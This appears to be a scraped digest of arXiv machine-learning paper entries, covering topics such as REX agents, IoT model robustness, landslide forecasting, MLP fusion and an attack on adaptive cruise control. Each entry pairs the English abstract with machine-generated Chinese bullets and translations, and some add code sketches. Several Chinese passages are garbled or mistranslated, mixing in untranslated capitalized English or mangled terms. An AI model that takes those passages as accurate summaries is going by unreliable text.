  • repo_url: https://github.com/facebookresearch/lancer
  • paper_authors: Arman Zharmagambetov, Brandon Amos, Aaron Ferber, Taoan Huang, Bistra Dilkina, Yuandong Tian
  • for: 优化问题中的部分观察或通用优化器表现不佳,学习一个优化器 $\mathbf{g}$ 来解决这些问题,可以快速加速优化过程,并且可以利用过去经验。
  • methods: 使用一个可学习的地形代理 $M$ 来取代 $f\circ \mathbf{g}$,这个地形代理可以更快速地计算,提供稠密和平滑的梯度,可以泛化到未看到的优化问题,并通过分布式优化来高效地学习。
  • results: 我们在合成问题(如最短路径和多维背包)以及真实问题(如投资组合优化)上测试了该方法,与最新的基线相比可以达到相同或更高的目标值,同时减少了对 $\mathbf{g}$ 的调用次数。特别是,我们的方法在高维、计算代价高的问题上表现出色。
    Abstract Recent works in learning-integrated optimization have shown promise in settings where the optimization problem is only partially observed or where general-purpose optimizers perform poorly without expert tuning. By learning an optimizer $\mathbf{g}$ to tackle these challenging problems with $f$ as the objective, the optimization process can be substantially accelerated by leveraging past experience. The optimizer can be trained with supervision from known optimal solutions or implicitly by optimizing the compound function $f\circ \mathbf{g}$. The implicit approach may not require optimal solutions as labels and is capable of handling problem uncertainty; however, it is slow to train and deploy due to frequent calls to optimizer $\mathbf{g}$ during both training and testing. The training is further challenged by sparse gradients of $\mathbf{g}$, especially for combinatorial solvers. To address these challenges, we propose using a smooth and learnable Landscape Surrogate $M$ as a replacement for $f\circ \mathbf{g}$. This surrogate, learnable by neural networks, can be computed faster than the solver $\mathbf{g}$, provides dense and smooth gradients during training, can generalize to unseen optimization problems, and is efficiently learned via alternating optimization. We test our approach on both synthetic problems, including shortest path and multidimensional knapsack, and real-world problems such as portfolio optimization, achieving comparable or superior objective values compared to state-of-the-art baselines while reducing the number of calls to $\mathbf{g}$. Notably, our approach outperforms existing methods for computationally expensive high-dimensional problems.
    摘要 近期学习与优化相结合的工作表明,在优化问题只能部分观测、或通用优化器在缺乏专家调参时表现不佳的场景下,这一思路颇有前景。通过学习一个优化器 $\mathbf{g}$ 来求解以 $f$ 为目标的这类困难问题,可以利用过去经验大幅加速优化过程。优化器可以用已知最优解作监督来训练,也可以通过优化复合函数 $f\circ \mathbf{g}$ 隐式训练。隐式方法可能不需要最优解作标签,并能处理问题的不确定性;但由于训练和测试中都要频繁调用优化器 $\mathbf{g}$,其训练和部署都较慢,而且 $\mathbf{g}$ 的梯度稀疏(尤其是组合求解器)进一步加大了训练难度。为应对这些挑战,我们提出用一个平滑、可学习的景观代理 $M$ 来替代 $f\circ \mathbf{g}$。该代理可由神经网络学习,计算比求解器 $\mathbf{g}$ 更快,在训练中提供稠密而平滑的梯度,能泛化到未见过的优化问题,并可通过交替优化高效地学习。我们在合成问题(包括最短路径和多维背包)以及真实问题(如投资组合优化)上测试了该方法,与最新的基线相比取得了相当或更优的目标值,同时减少了对 $\mathbf{g}$ 的调用次数。特别地,我们的方法在计算代价高的高维问题上优于现有方法。

REX: Rapid Exploration and eXploitation for AI Agents

  • paper_url: http://arxiv.org/abs/2307.08962
  • repo_url: None
  • paper_authors: Rithesh Murthy, Shelby Heinecke, Juan Carlos Niebles, Zhiwei Liu, Le Xue, Weiran Yao, Yihao Feng, Zeyuan Chen, Akash Gokul, Devansh Arpit, Ran Xu, Phil Mui, Huan Wang, Caiming Xiong, Silvio Savarese
  • for: 提高AI代理的快速探索和尝试能力,解决现有AutoGPT风格技术的缺陷,如偏重精确描述的决策和缺乏有系统的尝试和失败处理方式。
  • methods: 提出一种增强的Rapid Exploration and eXploitation(REX)方法,通过添加奖励层和基于Upper Confidence Bound(UCB)的概念,使AI代理性能更加稳定和高效。REX方法不需要模型细化,可以利用日志数据,并与现有基础模型协作无缝。
  • results: Comparative analysis表明,使用REX方法可以与现有方法(如Chain-of-Thoughts(CoT)和Reasoning viA Planning(RAP))相比,在一些情况下甚至超越其表现,同时具有显著减少执行时间的优点,提高了在多样化场景下的实际应用性。
    Abstract In this paper, we propose an enhanced approach for Rapid Exploration and eXploitation for AI Agents called REX. Existing AutoGPT-style techniques have inherent limitations, such as a heavy reliance on precise descriptions for decision-making, and the lack of a systematic approach to leverage try-and-fail procedures akin to traditional Reinforcement Learning (RL). REX introduces an additional layer of rewards and integrates concepts similar to Upper Confidence Bound (UCB) scores, leading to more robust and efficient AI agent performance. This approach has the advantage of enabling the utilization of offline behaviors from logs and allowing seamless integration with existing foundation models while it does not require any model fine-tuning. Through comparative analysis with existing methods such as Chain-of-Thoughts(CoT) and Reasoning viA Planning(RAP), REX-based methods demonstrate comparable performance and, in certain cases, even surpass the results achieved by these existing techniques. Notably, REX-based methods exhibit remarkable reductions in execution time, enhancing their practical applicability across a diverse set of scenarios.
    摘要 在这篇论文中,我们为 AI 代理提出了一种改进的快速探索与利用(Rapid Exploration and eXploitation,REX)方法。现有的 AutoGPT 风格技术存在固有局限,例如决策过度依赖精确的描述,以及缺乏像传统强化学习(RL)那样系统地利用试错过程的机制。REX 增加了一层额外奖励,并引入类似 Upper Confidence Bound(UCB)分数的概念,从而使 AI 代理的表现更加稳定和高效。该方法能够利用日志中的离线行为,无需模型微调即可与现有基础模型无缝集成。与 Chain-of-Thoughts(CoT)和 Reasoning viA Planning(RAP)等现有方法的对比分析表明,基于 REX 的方法表现相当,在某些情况下甚至更优;尤其是在执行时间上显著减少,使其在多样化场景下更具实用性。
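The abstract describes an additional reward layer with Upper Confidence Bound (UCB)-style scores. The sketch below shows only the standard UCB-1 bookkeeping such a layer could build on; the action names, reward stand-in, and class structure are our own illustrative assumptions, not REX itself.

```python
import math
from collections import defaultdict

class UCBActionSelector:
    """Standard UCB-1 bookkeeping over candidate actions (illustrative scaffolding)."""

    def __init__(self, c: float = 1.4):
        self.c = c
        self.counts = defaultdict(int)     # times each action was tried
        self.rewards = defaultdict(float)  # cumulative reward per action
        self.total = 0

    def score(self, action: str) -> float:
        if self.counts[action] == 0:
            return float("inf")  # force exploration of untried actions
        mean = self.rewards[action] / self.counts[action]
        bonus = self.c * math.sqrt(math.log(self.total) / self.counts[action])
        return mean + bonus

    def select(self, candidates):
        return max(candidates, key=self.score)

    def update(self, action: str, reward: float):
        self.counts[action] += 1
        self.rewards[action] += reward
        self.total += 1

selector = UCBActionSelector()
for step in range(20):
    action = selector.select(["search", "summarize", "ask_user"])
    reward = 1.0 if action == "search" else 0.2   # stand-in for task feedback
    selector.update(action, reward)
print(dict(selector.counts))
```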

Discretization-based ensemble model for robust learning in IoT

  • paper_url: http://arxiv.org/abs/2307.08955
  • repo_url: None
  • paper_authors: Anahita Namvar, Chandra Thapa, Salil S. Kanhere
  • for: 提高 IoT 设备识别模型的安全性,抵御黑盒和白盒攻击。
  • methods: integrate discretization techniques and ensemble methods to improve the robustness of machine learning models for IoT device identification.
  • results: 提高了 ML 模型对 IoT 设备识别的可靠性和安全性,抵御了黑盒和白盒攻击。
    Abstract IoT device identification is the process of recognizing and verifying connected IoT devices to the network. This is an essential process for ensuring that only authorized devices can access the network, and it is necessary for network management and maintenance. In recent years, machine learning models have been used widely for automating the process of identifying devices in the network. However, these models are vulnerable to adversarial attacks that can compromise their accuracy and effectiveness. To better secure device identification models, discretization techniques enable reduction in the sensitivity of machine learning models to adversarial attacks contributing to the stability and reliability of the model. On the other hand, Ensemble methods combine multiple heterogeneous models to reduce the impact of remaining noise or errors in the model. Therefore, in this paper, we integrate discretization techniques and ensemble methods and examine it on model robustness against adversarial attacks. In other words, we propose a discretization-based ensemble stacking technique to improve the security of our ML models. We evaluate the performance of different ML-based IoT device identification models against white box and black box attacks using a real-world dataset comprised of network traffic from 28 IoT devices. We demonstrate that the proposed method enables robustness to the models for IoT device identification.
    摘要 物联网(IoT)设备识别是对接入网络的 IoT 设备进行识别与验证的过程。这是确保只有授权设备才能访问网络的关键环节,也是网络管理与维护所必需的。近年来,机器学习模型被广泛用于自动识别网络中的设备。然而,这些模型容易受到对抗攻击,从而损害其准确性和有效性。为了更好地保护设备识别模型,离散化技术可以降低机器学习模型对对抗攻击的敏感度,提高模型的稳定性和可靠性;而集成方法则通过组合多个异构模型来减少残余噪声或误差的影响。因此,本文将离散化技术与集成方法结合,并考察其对模型抗对抗攻击鲁棒性的作用,即提出一种基于离散化的集成堆叠技术来提高机器学习模型的安全性。我们使用包含 28 个 IoT 设备网络流量的真实数据集,评估了不同机器学习 IoT 设备识别模型在白盒与黑盒攻击下的表现。结果表明,所提方法能够增强 IoT 设备识别模型的鲁棒性。
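A minimal sketch of the general recipe — discretize features, then stack heterogeneous base learners — is shown below using scikit-learn; the synthetic data, bin counts, base learners, and noise-based robustness probe are our own assumptions rather than the paper's exact setup.

```python
import numpy as np
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier, StackingClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import KBinsDiscretizer

# Stand-in for flow-level IoT traffic features (the real study uses traffic from 28 devices).
X, y = make_classification(n_samples=2000, n_features=20, n_classes=4,
                           n_informative=10, random_state=0)
X_tr, X_te, y_tr, y_te = train_test_split(X, y, random_state=0)

# Discretization coarsens each feature into bins, which blunts small adversarial perturbations.
discretize = KBinsDiscretizer(n_bins=8, encode="ordinal", strategy="quantile")

base_learners = [
    ("rf", RandomForestClassifier(n_estimators=100, random_state=0)),
    ("lr", LogisticRegression(max_iter=1000)),
]
model = make_pipeline(
    discretize,
    StackingClassifier(estimators=base_learners,
                       final_estimator=LogisticRegression(max_iter=1000)),
)
model.fit(X_tr, y_tr)
print("clean accuracy:", model.score(X_te, y_te))

# A crude robustness probe: small additive noise standing in for an evasion perturbation.
noise = 0.05 * np.random.default_rng(0).normal(size=X_te.shape)
print("perturbed accuracy:", model.score(X_te + noise, y_te))
```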

Knowledge-infused Deep Learning Enables Interpretable Landslide Forecasting

  • paper_url: http://arxiv.org/abs/2307.08951
  • repo_url: None
  • paper_authors: Zhengjing Ma, Gang Mei
  • for: 预测山崩发展和失败的可能性是一项复杂的任务,因为它们受到许多内部和外部因素的影响。
  • methods: 这篇文章使用了一种名为LFIT的转换器基本深度学习网络,该网络可以学习非线性关系,并且具有可读性和多源数据处理能力。
  • results: 文章表明,通过结合先前知识,可以提高整体山崩预测,并且可以捕捉不同地区的山崩行为和时间模式。通过使用塑形变形观测数据,文章验证了该方法的可靠性和可读性。
    Abstract Forecasting how landslides will evolve over time or whether they will fail is a challenging task due to a variety of factors, both internal and external. Despite their considerable potential to address these challenges, deep learning techniques lack interpretability, undermining the credibility of the forecasts they produce. The recent development of transformer-based deep learning offers untapped possibilities for forecasting landslides with unprecedented interpretability and nonlinear feature learning capabilities. Here, we present a deep learning pipeline that is capable of predicting landslide behavior holistically, which employs a transformer-based network called LFIT to learn complex nonlinear relationships from prior knowledge and multiple source data, identifying the most relevant variables, and demonstrating a comprehensive understanding of landslide evolution and temporal patterns. By integrating prior knowledge, we provide improvement in holistic landslide forecasting, enabling us to capture diverse responses to various influencing factors in different local landslide areas. Using deformation observations as proxies for measuring the kinetics of landslides, we validate our approach by training models to forecast reservoir landslides in the Three Gorges Reservoir and creeping landslides on the Tibetan Plateau. When prior knowledge is incorporated, we show that interpretable landslide forecasting effectively identifies influential factors across various landslides. It further elucidates how local areas respond to these factors, making landslide behavior and trends more interpretable and predictable. The findings from this study will contribute to understanding landslide behavior in a new way and make the proposed approach applicable to other complex disasters influenced by internal and external factors in the future.
    摘要 预测滑坡的发展趋势或是否会失败是一项复杂的任务,因为它们受到多种内部和外部因素的影响。 DESPITE THEIR POTENTIAL TO ADDRESS THESE CHALLENGES, deep learning techniques lack interpretability, which undermines the credibility of the forecasts they produce. However, the recent development of transformer-based deep learning offers untapped possibilities for forecasting landslides with unprecedented interpretability and nonlinear feature learning capabilities. 在这种情况下,我们提出了一个深度学习管道,可以捕捉滑坡的行为的整体特征,该管道使用名为LFIT的变换器基于网络,可以学习复杂的非线性关系,并且可以确定最重要的变量。通过结合先前知识,我们提供了改进的总体滑坡预测方法,可以捕捉不同的滑坡区域响应不同的外部因素的多样化响应。使用塑形观察作为滑坡动力的代理,我们验证了我们的方法,通过在三峡水库和藏北高原的滑坡中训练模型,预测滑坡的发展趋势。当嵌入先前知识时,我们显示出可解释的滑坡预测方法可以准确地确定影响滑坡的因素,并且可以解释不同的滑坡区域如何响应这些因素,使滑坡行为和趋势更加可解释和预测。这些发现将在未来对其他复杂的自然灾害,受到内部和外部因素影响的灾害中应用。

Alioth: A Machine Learning Based Interference-Aware Performance Monitor for Multi-Tenancy Applications in Public Cloud

  • paper_url: http://arxiv.org/abs/2307.08949
  • repo_url: https://github.com/sthowling/alioth
  • paper_authors: Tianyao Shi, Yingxuan Yang, Yunlong Cheng, Xiaofeng Gao, Zhen Fang, Yongqiang Yang
  • for: This paper aims to monitor the performance degradation of cloud applications in public clouds caused by co-location interference.
  • methods: The proposed method, Alioth, uses a novel machine learning framework that includes interference generators, denoising auto-encoders, domain adaptation neural networks, and SHAP explainers to monitor performance degradation.
  • results: Alioth achieves an average mean absolute error of 5.29% offline and 10.8% when testing on applications unseen in the training stage, outperforming baseline methods. It also demonstrates robustness in signaling quality-of-service violations under dynamic conditions.
    Abstract Multi-tenancy in public clouds may lead to co-location interference on shared resources, which possibly results in performance degradation of cloud applications. Cloud providers want to know when such events happen and how serious the degradation is, to perform interference-aware migrations and alleviate the problem. However, virtual machines (VM) in Infrastructure-as-a-Service public clouds are black-boxes to providers, where application-level performance information cannot be acquired. This makes performance monitoring intensely challenging as cloud providers can only rely on low-level metrics such as CPU usage and hardware counters. We propose a novel machine learning framework, Alioth, to monitor the performance degradation of cloud applications. To feed the data-hungry models, we first elaborate interference generators and conduct comprehensive co-location experiments on a testbed to build Alioth-dataset which reflects the complexity and dynamicity in real-world scenarios. Then we construct Alioth by (1) augmenting features via recovering low-level metrics under no interference using denoising auto-encoders, (2) devising a transfer learning model based on domain adaptation neural network to make models generalize on test cases unseen in offline training, and (3) developing a SHAP explainer to automate feature selection and enhance model interpretability. Experiments show that Alioth achieves an average mean absolute error of 5.29% offline and 10.8% when testing on applications unseen in the training stage, outperforming the baseline methods. Alioth is also robust in signaling quality-of-service violation under dynamicity. Finally, we demonstrate a possible application of Alioth's interpretability, providing insights to benefit the decision-making of cloud operators. The dataset and code of Alioth have been released on GitHub.
    摘要 公有云中的多租户可能导致共享资源上的同驻干扰,从而造成云应用性能下降。云服务商希望知道此类事件何时发生以及性能下降的严重程度,以便进行干扰感知的迁移并缓解问题。然而,在 IaaS 公有云中,虚拟机(VM)对服务商而言是黑盒,无法获取应用层性能信息,这使得性能监测极具挑战性:云服务商只能依赖 CPU 使用率和硬件计数器等低层指标。我们提出了一种新的机器学习框架 Alioth,用于监测云应用的性能下降。为了给数据需求量大的模型提供数据,我们首先构建干扰生成器,并在测试平台上进行全面的同驻实验,建立了反映真实场景复杂性与动态性的 Alioth 数据集。然后我们构建 Alioth:(1)利用去噪自编码器恢复无干扰情况下的低层指标以扩充特征;(2)设计基于领域自适应神经网络的迁移学习模型,使模型能泛化到离线训练中未见过的测试用例;(3)开发 SHAP 解释器以自动选择特征并增强模型可解释性。实验表明,Alioth 离线时的平均绝对误差为 5.29%,在训练阶段未见过的应用上为 10.8%,优于基线方法;在动态环境下,Alioth 也能可靠地提示服务质量违规。最后,我们展示了 Alioth 可解释性的一个可能应用,为云运维人员的决策提供洞见。Alioth 的数据集和代码已在 GitHub 上发布。

Mitigating Label Bias via Decoupled Confident Learning

  • paper_url: http://arxiv.org/abs/2307.08945
  • repo_url: None
  • paper_authors: Yunyi Li, Maria De-Arteaga, Maytal Saar-Tsechansky
  • for: 本研究旨在提出一种特点是适应标签偏见的分类方法,以便在涉及重要领域中减少算法偏见。
  • methods: 本研究提出了一种名为分离信心学习(DeCoLe)的遮盾方法,该方法可以减少标签偏见的影响。
  • results: 在一个Synthetic数据集上测试了DeCoLe方法,结果显示其能够成功地检测出偏见标签,并且在仇恨言语识别任务中超过其他方法表现。
    Abstract Growing concerns regarding algorithmic fairness have led to a surge in methodologies to mitigate algorithmic bias. However, such methodologies largely assume that observed labels in training data are correct. This is problematic because bias in labels is pervasive across important domains, including healthcare, hiring, and content moderation. In particular, human-generated labels are prone to encoding societal biases. While the presence of labeling bias has been discussed conceptually, there is a lack of methodologies to address this problem. We propose a pruning method -- Decoupled Confident Learning (DeCoLe) -- specifically designed to mitigate label bias. After illustrating its performance on a synthetic dataset, we apply DeCoLe in the context of hate speech detection, where label bias has been recognized as an important challenge, and show that it successfully identifies biased labels and outperforms competing approaches.
    摘要 algorithmic fairness的问题在不断增加,这导致了一系列方法来减少算法偏见。然而,这些方法假设训练数据中的标签是正确的。这是一个问题,因为标签中的偏见是广泛存在的,包括医疗、招聘和内容审核等重要领域。人类生成的标签容易带有社会偏见。虽然标签偏见的存在已经被讨论,但是没有有效的方法来解决这个问题。我们提出了一种剪裁方法——分离信任学习(DeCoLe),特意设计来减少标签偏见。我们在一个 sintetic 数据集上验证了 DeCoLe 的性能,然后在仇恨言语检测中应用了 DeCoLe,并证明它成功地标识了偏见标签,并超过了竞争方法的性能。
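The abstract does not spell out DeCoLe's procedure, so the sketch below shows a generic confident-learning pruning rule (flag examples whose given label falls below its class's confidence threshold while another class clears its own threshold), with the "decoupled" part approximated by applying the rule separately per group. Both the thresholding rule and the per-group decoupling are our reading, not the paper's exact algorithm.

```python
import numpy as np

def confident_learning_flags(pred_probs, given_labels):
    """Flag likely label errors: the given label is below its class's confidence
    threshold while another class clears its own threshold."""
    n_classes = pred_probs.shape[1]
    # Per-class threshold: mean predicted probability over examples labeled with that class.
    thresholds = np.array([
        pred_probs[given_labels == c, c].mean() if np.any(given_labels == c) else 1.0
        for c in range(n_classes)
    ])
    above = pred_probs >= thresholds            # which classes each example confidently matches
    flagged = []
    for i, y in enumerate(given_labels):
        confident = np.flatnonzero(above[i])
        if len(confident) > 0 and y not in confident:
            flagged.append(i)
    return np.array(flagged, dtype=int)

def decoupled_flags(pred_probs, given_labels, groups):
    """Run the rule separately within each group, so one group's bias pattern
    does not set the thresholds for another (our reading of 'decoupled')."""
    flagged = []
    for g in np.unique(groups):
        idx = np.flatnonzero(groups == g)
        flagged.extend(idx[confident_learning_flags(pred_probs[idx], given_labels[idx])])
    return np.sort(np.array(flagged, dtype=int))
```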

Siamese Networks for Weakly Supervised Human Activity Recognition

  • paper_url: http://arxiv.org/abs/2307.08944
  • repo_url: None
  • paper_authors: Taoran Sheng, Manfred Huber
  • for: 这篇论文旨在应用深度学习于人体活动识别,但是训练深度神经网络需要大量的明确标注数据,这是困难的获得。
  • methods: 这篇论文提出了一种使用多个同构网络进行训练,只使用数据对的相似性信息来训练模型,从而生成一个可以作为各种各样的聚类算法的度量模型。
  • results: 论文在三个数据集上进行了评估,并证明了模型的效果iveness在分类和识别连续人体活动序列中。
    Abstract Deep learning has been successfully applied to human activity recognition. However, training deep neural networks requires explicitly labeled data which is difficult to acquire. In this paper, we present a model with multiple siamese networks that are trained by using only the information about the similarity between pairs of data samples without knowing the explicit labels. The trained model maps the activity data samples into fixed size representation vectors such that the distance between the vectors in the representation space approximates the similarity of the data samples in the input space. Thus, the trained model can work as a metric for a wide range of different clustering algorithms. The training process minimizes a similarity loss function that forces the distance metric to be small for pairs of samples from the same kind of activity, and large for pairs of samples from different kinds of activities. We evaluate the model on three datasets to verify its effectiveness in segmentation and recognition of continuous human activity sequences.
    摘要 深度学习已成功应用于人类活动识别。然而,训练深度神经网络需要明确标注的数据,具体来说是困难的获得。在这篇论文中,我们提出了一种使用多个同构网络进行训练,不需要明确标注数据。训练模型将活动数据样本映射到固定大小的表示向量中,使得表示空间中的距离 approximates 输入空间中的相似性。因此,训练模型可以作为各种不同的聚类算法的度量。训练过程中 minimizes 一个相似损失函数,该函数让距离度量在同类活动样本对应的情况下很小,并在不同类活动样本对应的情况下很大。我们在三个数据集上验证了模型的有效性,以确认其在连续人类活动序列的分割和识别方面的表现。
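A minimal sketch of the pairwise training signal described above: an embedding network trained with a contrastive loss that only uses same/different-activity labels for pairs. The network architecture, margin, and random data are illustrative assumptions.

```python
import torch
import torch.nn as nn

class EmbeddingNet(nn.Module):
    """Maps a window of sensor readings to a fixed-size representation vector."""
    def __init__(self, in_dim=128, emb_dim=32):
        super().__init__()
        self.net = nn.Sequential(nn.Linear(in_dim, 64), nn.ReLU(), nn.Linear(64, emb_dim))

    def forward(self, x):
        return self.net(x)

def contrastive_loss(z1, z2, same, margin=1.0):
    """same=1 for pairs from the same activity, 0 otherwise (the only supervision used)."""
    d = torch.norm(z1 - z2, dim=1)
    return (same * d.pow(2) + (1 - same) * torch.clamp(margin - d, min=0).pow(2)).mean()

net = EmbeddingNet()
opt = torch.optim.Adam(net.parameters(), lr=1e-3)
x1, x2 = torch.randn(16, 128), torch.randn(16, 128)   # stand-in activity windows
same = torch.randint(0, 2, (16,)).float()              # pairwise similarity labels only
opt.zero_grad()
loss = contrastive_loss(net(x1), net(x2), same)
loss.backward()
opt.step()
print(float(loss))
```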

NTK-approximating MLP Fusion for Efficient Language Model Fine-tuning

  • paper_url: http://arxiv.org/abs/2307.08941
  • repo_url: https://github.com/weitianxin/mlp_fusion
  • paper_authors: Tianxin Wei, Zeming Guo, Yifan Chen, Jingrui He
  • for: 这篇论文旨在提出一种通过NTK数据来实现简化预训练语言模型(PLM)的方法,以减少PLM的计算和内存需求。
  • methods: 本文使用NTK几何来检查PLM的多层感知器(MLP)模组,并提出一种通过将MLP装置为一些中心的组合来实现轻量级PLM的方法。
  • results: 实验结果显示,该方法可以实现PLM的简化,并在自然语言理解(NLU)和生成(NLG)任务上进行了有效的调整。
    Abstract Fine-tuning a pre-trained language model (PLM) emerges as the predominant strategy in many natural language processing applications. However, even fine-tuning the PLMs and doing inference are expensive, especially on edge devices with low computing power. Some general approaches (e.g. quantization and distillation) have been widely studied to reduce the compute/memory of PLM fine-tuning, while very few one-shot compression techniques are explored. In this paper, we investigate the neural tangent kernel (NTK)--which reveals the gradient descent dynamics of neural networks--of the multilayer perceptrons (MLP) modules in a PLM and propose to coin a lightweight PLM through NTK-approximating MLP fusion. To achieve this, we reconsider the MLP as a bundle of sub-MLPs, and cluster them into a given number of centroids, which can then be restored as a compressed MLP and surprisingly shown to well approximate the NTK of the original PLM. Extensive experiments of PLM fine-tuning on both natural language understanding (NLU) and generation (NLG) tasks are provided to verify the effectiveness of the proposed method MLP fusion. Our code is available at https://github.com/weitianxin/MLP_Fusion.
    摘要 大多数自然语言处理应用中出现了调整预训练语言模型(PLM)的方法。然而,即使是调整PLM和做出判断都是昂贵的,特别是在边缘设备上进行。一些通用的方法(如量化和液化)已经广泛研究以降低PLM调整的计算/存储量,而很少有一次性压缩技术被探索。在这篇论文中,我们研究了神经积分析(NTK)——描述神经网络的梯度下降动力学——的多层感知器(MLP)模块在PLM中,并提议通过NTK-近似MLP融合来创造轻量级PLM。为此,我们重新考虑MLP为一个分解成多个子MLP的Bundle,并将其分成一定数量的中心点,然后可以将其Restore为压缩MLP,并意外地发现可以良好地近似原PLM的NTK。我们提供了大量PLM精度调整NLU和NLG任务的实验来证明提议的方法的有效性。我们的代码可以在https://github.com/weitianxin/MLP_Fusion上找到。
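One way to read "MLP fusion via clustering sub-MLPs into centroids" is sketched below for a single hidden layer: cluster the hidden neurons (incoming weights plus bias) with k-means and merge each cluster's outgoing weights. This is our simplified interpretation and omits the NTK-guided aspects of the paper's method.

```python
import numpy as np
from sklearn.cluster import KMeans

def fuse_mlp(W1, b1, W2, n_centroids, seed=0):
    """Compress a one-hidden-layer MLP x -> W2 @ relu(W1 @ x + b1) by clustering
    its hidden neurons (one 'sub-MLP' per neuron) into centroids.

    A fused neuron's incoming weights are the cluster centroid; its outgoing
    weights are the sum of the cluster members' outgoing weights, so the layer's
    output is approximately preserved when members are similar."""
    neurons = np.concatenate([W1, b1[:, None]], axis=1)        # (hidden, in_dim + 1)
    km = KMeans(n_clusters=n_centroids, n_init=10, random_state=seed).fit(neurons)
    W1_new = km.cluster_centers_[:, :-1]
    b1_new = km.cluster_centers_[:, -1]
    W2_new = np.zeros((W2.shape[0], n_centroids))
    for j, c in enumerate(km.labels_):
        W2_new[:, c] += W2[:, j]
    return W1_new, b1_new, W2_new

rng = np.random.default_rng(0)
W1, b1 = rng.normal(size=(512, 64)), rng.normal(size=512)
W2 = rng.normal(size=(10, 512)) / 512
W1c, b1c, W2c = fuse_mlp(W1, b1, W2, n_centroids=64)

x = rng.normal(size=64)
full = W2 @ np.maximum(W1 @ x + b1, 0)
fused = W2c @ np.maximum(W1c @ x + b1c, 0)
print("relative output gap:", np.linalg.norm(full - fused) / np.linalg.norm(full))
```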

Experimental Security Analysis of DNN-based Adaptive Cruise Control under Context-Aware Perception Attacks

  • paper_url: http://arxiv.org/abs/2307.08939
  • repo_url: None
  • paper_authors: Xugui Zhou, Anqi Chen, Maxfield Kouzel, Haotian Ren, Morgan McCarty, Cristina Nita-Rotaru, Homa Alemzadeh
  • for: 评估基于深度神经网络(DNN)的自适应巡航控制(ACC)系统在隐蔽感知攻击下的安全性,这类攻击通过向摄像头数据策略性地注入扰动来诱发前向碰撞。
  • methods: 提出了一种知识驱动与数据驱动相结合的方法,用于选择触发攻击的最关键时刻,以及一种基于优化的方法,在运行时自适应地生成图像扰动。
  • results: 在真实驾驶数据集、带有量产 ACC 控制软件的仿真平台以及实车驾驶模拟器上的实验表明,所提攻击造成碰撞的成功率是随机攻击的 142.9 倍,被安全功能(如自动紧急制动 AEB 和前向碰撞预警 FCW)缓解的比例降低了 89.6%,并且对真实环境因素和动态变化具有鲁棒性,同时具有隐蔽性。该研究还揭示了人类驾驶员与基本安全功能在防御此类攻击中的作用。
    Abstract Adaptive Cruise Control (ACC) is a widely used driver assistance feature for maintaining desired speed and safe distance to the leading vehicles. This paper evaluates the security of the deep neural network (DNN) based ACC systems under stealthy perception attacks that strategically inject perturbations into camera data to cause forward collisions. We present a combined knowledge-and-data-driven approach to design a context-aware strategy for the selection of the most critical times for triggering the attacks and a novel optimization-based method for the adaptive generation of image perturbations at run-time. We evaluate the effectiveness of the proposed attack using an actual driving dataset and a realistic simulation platform with the control software from a production ACC system and a physical-world driving simulator while considering interventions by the driver and safety features such as Automatic Emergency Braking (AEB) and Forward Collision Warning (FCW). Experimental results show that the proposed attack achieves 142.9x higher success rate in causing accidents than random attacks and is mitigated 89.6% less by the safety features while being stealthy and robust to real-world factors and dynamic changes in the environment. This study provides insights into the role of human operators and basic safety interventions in preventing attacks.
    摘要 这篇研究评估了基于深度神经网络(DNN)的自适应巡航控制(ACC)系统的安全性,以及这些系统对于隐藏式感知攻击的抵抗力。我们提出了一种结合知识驱动和数据驱动的方法,以选择最重要的时刻进行攻击,并且使用优化方法生成Run-time中的像素噪声。我们使用实际驾驶数据和真实的驾驶 simulate平台,考虑到驾驶员的干预和安全功能,例如自动紧急刹车(AEB)和前方冲击警示(FCW)。实验结果显示,我们的攻击成功率高于随机攻击的142.9倍,并且受到安全功能的抑制89.6%。此研究给出了人类驾驶员和基本安全功能的防御效果。

Multi-stage Neural Networks: Function Approximator of Machine Precision

  • paper_url: http://arxiv.org/abs/2307.08934
  • repo_url: None
  • paper_authors: Yongji Wang, Ching-Yao Lai
  • for: 本文旨在提高神经网络在科学问题中的精度,利用多阶段神经网络缓解谱偏差(spectral bias)。
  • methods: 本文将训练过程划分为多个阶段,每个阶段训练一个新的网络来拟合上一阶段的残差。
  • results: 本文表明,多阶段训练可将预测误差降至机器精度 $O(10^{-16})$ 的水平,而这是单个神经网络很难达到的。
    Abstract Deep learning techniques are increasingly applied to scientific problems, where the precision of networks is crucial. Despite being deemed as universal function approximators, neural networks, in practice, struggle to reduce the prediction errors below $O(10^{-5})$ even with large network size and extended training iterations. To address this issue, we developed the multi-stage neural networks that divides the training process into different stages, with each stage using a new network that is optimized to fit the residue from the previous stage. Across successive stages, the residue magnitudes decreases substantially and follows an inverse power-law relationship with the residue frequencies. The multi-stage neural networks effectively mitigate the spectral biases associated with regular neural networks, enabling them to capture the high frequency feature of target functions. We demonstrate that the prediction error from the multi-stage training for both regression problems and physics-informed neural networks can nearly reach the machine-precision $O(10^{-16})$ of double-floating point within a finite number of iterations. Such levels of accuracy are rarely attainable using single neural networks alone.
    摘要 深度学习技术正越来越多地应用于科学问题,其中网络的精度至关重要。尽管神经网络被视为通用函数逼近器,但在实践中,即使使用大型网络并延长训练轮次,预测误差也难以降到 $O(10^{-5})$ 以下。为解决这一问题,我们提出了多阶段神经网络:将训练过程划分为多个阶段,每个阶段用一个新的网络去拟合上一阶段的残差。随着阶段推进,残差幅度大幅减小,并与残差频率呈反幂律关系。多阶段神经网络有效缓解了普通神经网络的谱偏差,使其能够捕捉目标函数的高频特征。我们证明,对于回归问题和物理信息神经网络(PINN),多阶段训练的预测误差可以在有限迭代内几乎达到双精度浮点的机器精度 $O(10^{-16})$,而单个神经网络很难达到这样的精度水平。
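The staged residual-fitting loop is the core mechanism and is easy to sketch. The example below uses scikit-learn MLPs on a 1-D high-frequency target; it will not reach the double-precision errors reported in the paper (which require carefully designed architectures and training), but it shows how each stage fits the renormalized residue of the previous one.

```python
import numpy as np
from sklearn.neural_network import MLPRegressor

rng = np.random.default_rng(0)
x = np.linspace(0, 1, 2000)[:, None]
y = np.sin(20 * np.pi * x[:, 0]) + 0.3 * np.sin(60 * np.pi * x[:, 0])  # high-frequency target

stages, prediction = [], np.zeros_like(y)
for stage in range(3):
    residue = y - prediction
    scale = np.abs(residue).max()              # renormalize the residue before fitting it
    net = MLPRegressor(hidden_layer_sizes=(128, 128), max_iter=3000, random_state=stage)
    net.fit(x, residue / scale)
    stages.append((net, scale))
    prediction = prediction + scale * net.predict(x)
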